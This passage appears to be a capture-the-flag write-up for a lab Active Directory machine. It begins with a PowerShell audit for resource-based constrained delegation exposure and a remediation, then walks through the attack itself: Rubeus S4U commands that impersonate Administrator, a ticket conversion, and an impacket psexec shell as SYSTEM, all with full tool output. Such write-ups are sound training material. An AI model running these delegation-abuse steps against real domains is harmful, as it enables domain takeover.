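    $dangerousAces = foreach ($dc in Get-ADDomainController -Filter *) {
        $acl = Get-Acl -Path ('AD:\' + $dc.ComputerObjectDN)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -match $TrustedPrincipal) { continue }
            $r = $ace.ActiveDirectoryRights
            $writesRbcd = $r.HasFlag($rights::WriteProperty) -and
                          ($ace.ObjectType -eq $rbcdGuid -or $ace.ObjectType -eq [guid]::Empty)
            if ($r.HasFlag($rights::GenericAll) -or $r.HasFlag($rights::WriteDacl) -or
                $r.HasFlag($rights::WriteOwner) -or $writesRbcd) {
                [pscustomobject]@{ DC = $dc.Name; Principal = $ace.IdentityReference.Value; Rights = $r }
            }
        }
    }

    [pscustomobject]@{
        MachineAccountQuota  = $maq
        RbcdConfigured       = @($rbcd)
        UserCreatedComputers = @($userCreated)
        DangerousAcesOnDCs   = @($dangerousAces)
    }
}

Get-RbcdExposure | Format-List

# Remediation for the first condition: stop ordinary users from creating machine accounts.
#   Set-ADDomain -Identity (Get-ADDomain) -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
```

On this box the report would show the quota of 10, FAKE-COMP03 both as a user-created computer and as the principal allowed to act on behalf of DC, and the shared support accounts group as a non-admin principal holding GenericAll on the DC object.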

Run the S4U attack.
The tickets are issued with Rubeus.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP03$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : FAKE-COMP03$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp03.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 72D3D2472C10AB93EDDB8BB87C51E4A2
[*]       aes256_cts_hmac_sha1 : 560AF12B8DBBDA755C43F4492CBD19FEE8A4CAD073F94C344C7807D0BE8153B6
[*]       des_cbc_md5          : B6DFEA517A5EA7B6

The resulting rc4_hmac hash is used to request a Kerberos ticket as Administrator.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP03$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP03$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD

(omitted)


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP03$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP03$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

    doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD

(omitted)

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      doIGaDCCBmSgAwIBBaEDAgEWooIFejCCBXZhggVyMIIFbqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6AD

(omitted)

[+] Ticket successfully imported!

Copy the value of the last ticket, reformat it into a single base64 string, and save it as ticket.kirbi.b64.


Base64-decode the saved file and save the result as ticket.kirbi.

$ base64 -d ticket.kirbi.b64 > ticket.kirbi

Finally, convert the ticket to a format that impacket can use.

$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Use the ticket to get a shell.
With psexec, I got a shell as the SYSTEM account.

$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

I got the root flag from C:\Users\Administrator\Desktop\root.txt.

C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49